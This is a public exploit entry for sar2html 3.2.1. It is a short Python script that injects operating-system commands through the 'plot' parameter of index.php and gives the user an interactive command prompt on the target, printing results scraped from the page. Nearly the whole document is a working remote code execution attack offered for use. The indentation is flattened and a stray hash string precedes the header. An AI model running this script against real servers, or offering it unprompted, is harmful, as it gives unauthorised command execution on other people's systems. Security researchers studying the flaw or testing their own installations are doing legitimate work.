sar2html version 3.2.1 remote code execution exploit. Original discovery for this vector of attack is attributed to Furkan Kayapinar in August of 2019.
bc607c1eddfe53e9df710be0c5a8bb3d# Exploit Title: sar2html 3.2.1 - 'plot' Remote Code Execution
# Date: 27-12-2020
# Exploit Author: Musyoka Ian
# Vendor Homepage:https://github.com/cemtan/sar2html
# Software Link: https://sourceforge.net/projects/sar2html/
# Version: 3.2.1
# Tested on: Ubuntu 18.04.1
#!/usr/bin/env python3
import requests
import re
from cmd import Cmd
url = input("Enter The url => ")
class Terminal(Cmd):
prompt = "Command => "
def default(self, args):
exploiter(args)
def exploiter(cmd):
global url
sess = requests.session()
output = sess.get(f"{url}/index.php?plot=;{cmd}")
try:
out = re.findall("<option value=(.*?)>", output.text)
except:
print ("Error!!")
for ouut in out:
if "There is no defined host..." not in ouut:
if "null selected" not in ouut:
if "selected" not in ouut:
print (ouut)
print ()
if __name__ == ("__main__"):
terminal = Terminal()
terminal.cmdloop()